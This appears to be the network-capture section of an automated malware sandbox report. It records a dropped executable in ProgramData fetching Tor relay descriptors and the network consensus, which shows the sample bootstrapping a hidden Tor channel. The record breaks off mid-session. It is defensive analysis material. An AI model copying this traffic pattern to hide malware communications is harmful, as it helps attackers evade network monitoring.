74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 31 33 3a 32 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 44 33 45 39 20 46 38 36 37 20 44 44 46 32 20 38 44 45 31 20 39 31 45 41 20 36 31 31 46 20 44 33 36 30 20 33 35 33 43 20 38 33 38 34 20 46 38 41 42 0a 75 70 74 69 6d 65 20 37 38 31 0a 62 61 6e 64 77 69 64 74 68 20 35 31 32 30 30 30 20 36 31 34 34 30 30 20 34 38 37 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 45 39 31 45 32 42 37 41 31 42 38 30 38 39 46 45 41 32 31 43 36 39 37 30 30 33 38 46 44 33 34 41 33 43 31 36 36 39 34 20 62 31 78 61 39 57 32 5a 56 46 78 6c 36 2f 65 54 73 35 2f 75 4b 58 6d 57 7a 6a 4c 41 2b 77 6e 56 42 69 64 59 31 59 38 65 4c 44 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 61 5a 6a 45 6e 47 38 78 58 4f 53 51 42 53 58 63 68 79 39 6f 48 67 4c 75 47 4e 7a 66 6b 4f 6b 48 50 35 46 70 72 4a 64 56 71 64 38 37 42 31 51 68 48 77 33 75 2f 69 0a 4f 6a 75 51 73 2f 4b 69 41 30 51 34 2f 47 2b 67 57 75 69 43 33 78 68 6d 43 2b 6a 69 69 68 50 64 54 70 56 34 64 45 58 4d 63 66 73 78 6c 32 2f 6d 72 2b 6b 67 48 32 53 56 54 37 30 69 74 79 77 32 0a 62 4f 69 4e 57 41 2b 6d 7a 71 7a 76 47 6f 37 38 49 31 45 56 44 50 69 47 7a 42 75 46 47 78 4b 55 50 6e 49 73 74 6d 79 72 62 74 36 6a 57 5a 79 4a 7a 39 4e 42 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2f 67 7a 73 74 58 70 55 61 41 4c 68 6a 51 77 6d 77 48 71 4a
                          Data Ascii: router transtbb 84.155.152.82 14074 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxV6AQFVLbRbCeZ604P2tD8pIBGQNrOtjXuIZMasp0fB/c6QAQAgBABo560RR9EGj3UAYvjPvduapVWIOEW1OoPjpEGKO6AZpydJVYo/2124yMtbXNCthtdwqJ6tgsvpVrtpeOVMmlO4RUXBZZvPI9hXFNRwge87hzCcAcBmQtphX60ZYTf3UQk=-----END ED25519 CERT-----master-key-ed25519 aOetEUfRBo91AGL4z73bmqVViDhFtTqD46RBijugGacplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:13:26fingerprint D3E9 F867 DDF2 8DE1 91EA 611F D360 353C 8384 F8ABuptime 781bandwidth 512000 614400 487150extra-info-digest 6E91E2B7A1B8089FEA21C6970038FD34A3C16694 b1xa9W2ZVFxl6/eTs5/uKXmWzjLA+wnVBidY1Y8eLDMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANaZjEnG8xXOSQBSXchy9oHgLuGNzfkOkHP5FprJdVqd87B1QhHw3u/iOjuQs/KiA0Q4/G+gWuiC3xhmC+jiihPdTpV4dEXMcfsxl2/mr+kgH2SVT70ityw2bOiNWA+mzqzvGo78I1EVDPiGzBuFGxKUPnIstmyrbt6jWZyJz9NBAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL/gzstXpUaALhjQwmwHqJ


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          33192.168.2.34973477.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:29.413095951 CET5316OUTGET /tor/server/fp/02d832f002d4ca3d25adda2cbbb2d09ee41a15ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:29.480715990 CET5317INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:29 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:29 GMT
                          Data Raw: 72 6f 75 74 65 72 20 38 34 31 32 30 33 34 31 30 33 37 38 30 32 33 37 20 32 30 39 2e 31 34 31 2e 33 37 2e 39 34 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 61 4c 41 65 53 79 6a 35 7a 47 4c 76 6e 7a 72 59 69 6c 67 6a 71 75 50 48 52 4b 5a 37 63 6d 34 63 57 6d 39 71 35 52 53 4e 73 63 4d 65 44 65 41 51 41 67 42 41 42 64 4b 72 4e 74 0a 4d 69 34 61 42 4f 6d 70 31 74 6e 79 48 4b 68 62 53 59 63 37 55 7a 4b 37 6a 51 4d 4b 59 7a 37 6c 70 4e 52 4a 4b 36 38 62 48 34 35 4c 50 41 37 33 74 34 65 4c 47 67 4b 31 6d 6f 66 4b 77 75 30 48 0a 38 71 30 2f 38 4d 43 4e 68 2f 78 75 5a 4f 2f 4d 71 4c 74 74 57 62 49 32 42 61 61 64 59 30 45 35 35 6b 43 46 74 4f 6d 51 59 45 79 64 4f 46 76 62 47 41 65 33 6f 4b 61 33 56 41 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 58 53 71 7a 62 54 49 75 47 67 54 70 71 64 62 5a 38 68 79 6f 57 30 6d 48 4f 31 4d 79 75 34 30 44 43 6d 4d 2b 35 61 54 55 53 53 73 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 34 3a 30 33 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 44 38 20 33 32 46 30 20 30 32 44 34 20 43 41 33 44 20 32 35 41 44 20 44 41 32 43 20 42 42 42 32 20 44 30 39 45 20 45 34 31 41 20 31 35 41 42 0a 75 70 74 69 6d 65 20 33 39 33 38 35 39 38 0a 62 61 6e 64 77 69 64 74 68 20 33 30 37 32 30 30 30 20 31 30 37 33 37 34 31 38 32 34 20 37 36 32 35 35 37 39 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 35 31 41 46 42 32 34 46 44 45 32 35 33 43 30 46 30 42 45 46 32 37 42 41 45 38 33 46 42 45 30 38 46 33 36 42 43 38 39 20 33 68 6d 57 74 54 44 36 43 68 49 41 47 6d 73 4f 4a 43 48 37 7a 6a 4f 62 33 77 58 47 4a 42 2b 57 59 56 4f 48 6c 6a 55 7a 33 35 51 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 32 4a 31 34 33 34 4f 4e 63 41 49 37 70 75 37 33 51 35 41 38 56 64 42 4f 69 61 63 35 33 59 74 46 62 31 78 44 64 43 6a 31 57 4d 4d 65 52 46 76 4d 51 44 4a 45 58 36 0a 38 71 72 48 50 6f 45 31 63 4e 4e 32 59 6e 44 6f 74 4f 7a 76 4e 62 64 4a 36 79 69 32 62 6a 5a 61 41 62 31 6d 64 49 52 43 6c 56 6f 4b 38 49 41 31 5a 30 41 79 58 72 51 76 53 57 61 37 6d 7a 31 36 0a 47 2f 32 6e 39 6f 71 44 47 79 39 77 67 78 2b 57 6b 45 42 41 46 6e 33 37 39 70 55 34 78 78 57 41 42 34 4b 6d 4f 46 31 2f 49 67 2f 34 75 73 43 63 43 57 55 64 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 39 55 41
                          Data Ascii: router 8412034103780237 209.141.37.94 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxaLAeSyj5zGLvnzrYilgjquPHRKZ7cm4cWm9q5RSNscMeDeAQAgBABdKrNtMi4aBOmp1tnyHKhbSYc7UzK7jQMKYz7lpNRJK68bH45LPA73t4eLGgK1mofKwu0H8q0/8MCNh/xuZO/MqLttWbI2BaadY0E55kCFtOmQYEydOFvbGAe3oKa3VA4=-----END ED25519 CERT-----master-key-ed25519 XSqzbTIuGgTpqdbZ8hyoW0mHO1Myu40DCmM+5aTUSSsplatform Tor 0.4.7.10 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 04:03:47fingerprint 02D8 32F0 02D4 CA3D 25AD DA2C BBB2 D09E E41A 15ABuptime 3938598bandwidth 3072000 1073741824 7625579extra-info-digest F51AFB24FDE253C0F0BEF27BAE83FBE08F36BC89 3hmWtTD6ChIAGmsOJCH7zjOb3wXGJB+WYVOHljUz35Qonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAK2J1434ONcAI7pu73Q5A8VdBOiac53YtFb1xDdCj1WMMeRFvMQDJEX68qrHPoE1cNN2YnDotOzvNbdJ6yi2bjZaAb1mdIRClVoK8IA1Z0AyXrQvSWa7mz16G/2n9oqDGy9wgx+WkEBAFn379pU4xxWAB4KmOF1/Ig/4usCcCWUdAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAN9UA


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          34192.168.2.349738193.23.244.24480C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:40.147089958 CET5332OUTGET /tor/status-vote/current/consensus HTTP/1.0
                          Host: 193.23.244.244
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:40.175998926 CET5333INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:40 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Sun, 11 Dec 2022 09:00:00 GMT
                          Vary: X-Or-Diff-From-Consensus
                          Data Raw: 6e 65 74 77 6f 72 6b 2d 73 74 61 74 75 73 2d 76 65 72 73 69 6f 6e 20 33 0a 76 6f 74 65 2d 73 74 61 74 75 73 20 63 6f 6e 73 65 6e 73 75 73 0a 63 6f 6e 73 65 6e 73 75 73 2d 6d 65 74 68 6f 64 20 33 32 0a 76 61 6c 69 64 2d 61 66 74 65 72 20 32 30 32 32 2d 31 32 2d 31 31 20 30 38 3a 30 30 3a 30 30 0a 66 72 65 73 68 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 30 39 3a 30 30 3a 30 30 0a 76 61 6c 69 64 2d 75 6e 74 69 6c 20 32 30 32 32 2d 31 32 2d 31 31 20 31 31 3a 30 30 3a 30 30 0a 76 6f 74 69 6e 67 2d 64 65 6c 61 79 20 33 30 30 20 33 30 30 0a 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 73 65 72 76 65 72 2d 76 65 72 73 69 6f 6e 73 20 30 2e 34 2e 35 2e 36 2c 30 2e 34 2e 35 2e 37 2c 30 2e 34 2e 35 2e 38 2c 30 2e 34 2e 35 2e 39 2c 30 2e 34 2e 35 2e 31 30 2c 30 2e 34 2e 35 2e 31 31 2c 30 2e 34 2e 35 2e 31 32 2c 30 2e 34 2e 35 2e 31 34 2c 30 2e 34 2e 35 2e 31 35 2c 30 2e 34 2e 37 2e 37 2c 30 2e 34 2e 37 2e 38 2c 30 2e 34 2e 37 2e 31 30 2c 30 2e 34 2e 37 2e 31 31 2c 30 2e 34 2e 37 2e 31 32 0a 6b 6e 6f 77 6e 2d 66 6c 61 67 73 20 41 75 74 68 6f 72 69 74 79 20 42 61 64 45 78 69 74 20 45 78 69 74 20 46 61 73 74 20 47 75 61 72 64 20 48 53 44 69 72 20 4d 69 64 64 6c 65 4f 6e 6c 79 20 4e 6f 45 64 43 6f 6e 73 65 6e 73 75 73 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 53 74 61 6c 65 44 65 73 63 20 53 79 62 69 6c 20 56 32 44 69 72 20 56 61 6c 69 64 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 63 6f 6d 6d 65 6e 64 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 63 6c 69 65 6e 74 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 4c 69 6e 6b 3d 34 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 72 65 71 75 69 72 65 64 2d 72 65 6c 61 79 2d 70 72 6f 74 6f 63 6f 6c 73 20 43 6f 6e 73 3d 32 20 44 65 73 63 3d 32 20 44 69 72 43 61 63 68 65 3d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 20 48 53 52 65 6e 64 3d 32 20 4c 69 6e 6b 3d 34 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 33 20 4d 69 63 72 6f 64 65 73 63 3d 32 20 52 65 6c 61 79 3d 32 0a 70 61 72 61 6d 73 20 43 69 72 63 75 69 74 50 72 69 6f 72 69 74 79 48 61 6c 66 6c 69 66 65 4d 73 65 63 3d 33 30 30 30 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 42 75 72 73 74 3d 36 30 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61
                          Data Ascii: network-status-version 3vote-status consensusconsensus-method 32valid-after 2022-12-11 08:00:00fresh-until 2022-12-11 09:00:00valid-until 2022-12-11 11:00:00voting-delay 300 300client-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12server-versions 0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.5.12,0.4.5.14,0.4.5.15,0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Validrecommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCrea
                          Dec 11, 2022 09:26:40.176141977 CET5334INData Raw: 74 69 6f 6e 45 6e 61 62 6c 65 64 3d 31 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 4d 69 6e 43 6f 6e 6e 65 63 74 69 6f 6e 73 3d 32 20 44 6f 53 43 69 72 63 75 69 74 43 72 65 61 74 69 6f 6e 52 61 74 65 3d 32 20 44 6f 53 43 6f 6e 6e 65
                          Data Ascii: tionEnabled=1 DoSCircuitCreationMinConnections=2 DoSCircuitCreationRate=2 DoSConnectionEnabled=1 DoSConnectionMaxConcurrentCount=50 DoSRefuseSingleHopClientRendezvous=1 ExtendByEd25519ID=1 KISTSchedRunInterval=2 NumNTorsPerTAP=100 UseOptimisti
                          Dec 11, 2022 09:26:40.176202059 CET5336INData Raw: 65 5f 70 65 72 63 65 6e 74 3d 35 30 30 20 73 65 6e 64 6d 65 5f 65 6d 69 74 5f 6d 69 6e 5f 76 65 72 73 69 6f 6e 3d 31 0a 73 68 61 72 65 64 2d 72 61 6e 64 2d 70 72 65 76 69 6f 75 73 2d 76 61 6c 75 65 20 38 20 4f 55 58 73 33 33 5a 36 6a 77 43 61 43
                          Data Ascii: e_percent=500 sendme_emit_min_version=1shared-rand-previous-value 8 OUXs33Z6jwCaC7+01M0edsV3bfQTozE0XT1G+S9nMBM=shared-rand-current-value 8 zXIuCMixcVdQiw7MqOKRh96/AoG3SQusUgMfgw4Gezk=dir-source dannenberg 0232AF901C31A04EE9848595AF9BB7620D
                          Dec 11, 2022 09:26:40.176261902 CET5337INData Raw: 36 36 2e 33 33 2e 34 35 20 38 30 20 34 34 33 0a 63 6f 6e 74 61 63 74 20 65 6d 61 69 6c 3a 75 73 75 72 61 5b 5d 73 61 62 6f 74 61 67 65 2e 6f 72 67 20 75 72 6c 3a 68 74 74 70 73 3a 2f 2f 33 38 36 62 73 64 2e 6e 65 74 20 70 72 6f 6f 66 3a 75 72 69
                          Data Ascii: 66.33.45 80 443contact email:usura[]sabotage.org url:https://386bsd.net proof:uri-rsa abuse:abuse[]sabotage.net twitter:adejoode ciissversion:2vote-digest 69686C901A02C875F25F646E9DE068CADA61BFB9dir-source gabelmoo ED03BB616EB2F60BEC8015111
                          Dec 11, 2022 09:26:40.176321983 CET5338INData Raw: 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 77 20 42 61 6e 64 77 69 64 74 68 3d 33 31 30 30 30 0a 70 20 61 63 63 65 70 74 20 32 30 2d 32 33 2c 34 33 2c 35 33 2c 37 39 2d 38 31 2c 38 38 2c 31 31 30 2c 31 34 33 2c 31 39 34 2c 32 32 30 2c 33
                          Data Ascii: ding=2 Relay=1-4w Bandwidth=31000p accept 20-23,43,53,79-81,88,110,143,194,220,389,443,464,531,543-544,554,563,636,706,749,873,902-904,981,989-995,1194,1220,1293,1500,1533,1677,1723,1755,1863,2082-2083,2086-2087,2095-2096,2102-2104,3128,3389
                          Dec 11, 2022 09:26:40.176386118 CET5339INData Raw: 76 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53
                          Data Ascii: v Tor 0.4.7.11pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=11000p reject 1-65535r suominode AFYmkM8z9TfE9MlYdlX3Rphoxzo St+sEFoocvWpEPAG1fBXF
                          Dec 11, 2022 09:26:40.176446915 CET5341INData Raw: 20 5b 32 61 30 33 3a 65 36 30 30 3a 31 30 30 3a 3a 37 33 5d 3a 38 30 38 30 0a 73 20 45 78 69 74 20 46 61 73 74 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 56 61 6c 69 64 0a 76 20 54 6f 72 20 30 2e 34 2e 38 2e 30 2d 61 6c 70 68 61 2d 64 65 76
                          Data Ascii: [2a03:e600:100::73]:8080s Exit Fast Running Stable Validv Tor 0.4.8.0-alpha-devpr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=27000p accept 8
                          Dec 11, 2022 09:26:40.176505089 CET5342INData Raw: 4d 70 4f 73 50 77 4c 6e 4b 7a 4e 73 6a 64 6b 4d 51 20 32 30 32 32 2d 31 32 2d 31 30 20 32 30 3a 34 36 3a 30 32 20 31 39 39 2e 32 34 39 2e 32 33 30 2e 31 30 33 20 34 34 33 20 30 0a 61 20 5b 32 36 32 30 3a 37 3a 36 30 30 31 3a 3a 31 30 33 5d 3a 38
                          Data Ascii: MpOsPwLnKzNsjdkMQ 2022-12-10 20:46:02 199.249.230.103 443 0a [2620:7:6001::103]:80s Exit Fast Guard HSDir Running Stable V2Dir Validv Tor 0.4.7.10pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth
                          Dec 11, 2022 09:26:40.176565886 CET5343INData Raw: 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20
                          Data Ascii: =1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=24000p accept 20-21,43,53,79-81,88,110,143,220,389,443,464,531,543-544,554,636,706,749,873,902-904,981,989-993,995,1194,1220,1293,1500,153
                          Dec 11, 2022 09:26:40.176626921 CET5345INData Raw: 2e 37 2e 37 0a 70 72 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c
                          Data Ascii: .7.7pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Bandwidth=110p reject 1-65535r effiorg1984 AMzmqE5tY6GkLhBYObyO1dSxZmk 8OYcUi8kTKuY2BCX2ZaZN/s9v9w 202
                          Dec 11, 2022 09:26:40.176686049 CET5346INData Raw: 33 20 35 2e 39 2e 35 36 2e 32 34 39 20 34 30 38 30 20 30 0a 61 20 5b 32 61 30 31 3a 34 66 38 3a 31 36 31 3a 35 32 63 62 3a 3a 32 5d 3a 34 30 38 30 0a 73 20 46 61 73 74 20 48 53 44 69 72 20 52 75 6e 6e 69 6e 67 20 53 74 61 62 6c 65 20 56 32 44 69
                          Data Ascii: 3 5.9.56.249 4080 0a [2a01:4f8:161:52cb::2]:4080s Fast HSDir Running Stable V2Dir Validv Tor 0.4.7.10pr Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4w Band


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          35192.168.2.34974084.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:41.497925997 CET7817OUTGET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:41.543423891 CET7818INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:27 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:27 GMT
                          Data Raw: 72 6f 75 74 65 72 20 47 61 6c 61 78 79 4e 65 77 73 52 61 64 69 6f 20 38 34 2e 36 32 2e 32 34 35 2e 36 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 78 41 56 62 73 31 50 49 30 56 44 45 46 55 7a 35 35 66 52 66 78 68 2b 37 4d 47 4e 72 41 35 74 35 61 4e 33 49 65 73 47 66 73 55 71 78 51 41 51 41 67 42 41 42 42 51 48 4b 77 0a 4d 38 49 47 67 51 39 64 4b 32 52 34 4e 4d 67 7a 73 4c 7a 2f 6f 6e 78 33 46 51 49 74 75 78 52 76 69 4d 74 36 48 57 68 53 4b 63 6f 6a 36 65 77 45 6c 4e 6e 61 50 34 59 6f 45 53 4d 7a 64 6d 76 73 0a 4b 55 72 72 7a 59 65 4c 65 6a 77 33 33 70 55 48 38 71 4b 43 70 72 6f 41 37 33 58 6d 2b 64 52 79 44 38 53 32 72 36 2b 46 53 72 6b 76 43 77 55 75 78 74 41 6b 50 41 35 31 62 51 55 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 51 55 42 79 73 44 50 43 42 6f 45 50 58 53 74 6b 65 44 54 49 4d 37 43 38 2f 36 4a 38 64 78 55 43 4c 62 73 55 62 34 6a 4c 65 68 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4f 70 65 6e 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 